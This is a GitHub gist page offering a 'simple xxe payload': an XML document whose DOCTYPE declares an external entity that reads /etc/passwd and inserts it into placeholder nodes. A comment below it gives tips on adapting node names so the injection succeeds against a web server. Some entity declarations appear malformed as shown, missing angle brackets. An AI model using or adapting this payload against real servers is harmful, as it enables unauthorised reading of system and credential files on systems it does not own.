Created
October 24, 2018 01:56
-
-
Save slayerlab/aa308fe97c991017f1621e4ef622512c to your computer and use it in GitHub Desktop.
simple xxe payload
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0"?> | |
| <!DOCTYPE data [ | |
| !ELEMENT data (x)> | |
| !ENTITY file SYSTEM "/etc/passwd" | |
| ]> | |
| <RequiredRootXMLNode> | |
| <RequiredChildXMLNode>&file;</RequiredChildXMLNode> | |
| </RequiredRootXMLNode> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
x = whatever value
root node = first node in XML
child node = node inside of the "first node"
if you'll use XXE injection, you need to know that some webserver requires specific xml node name or it will going to fail during injection.
The webserver might returns "Internal server error" for instance.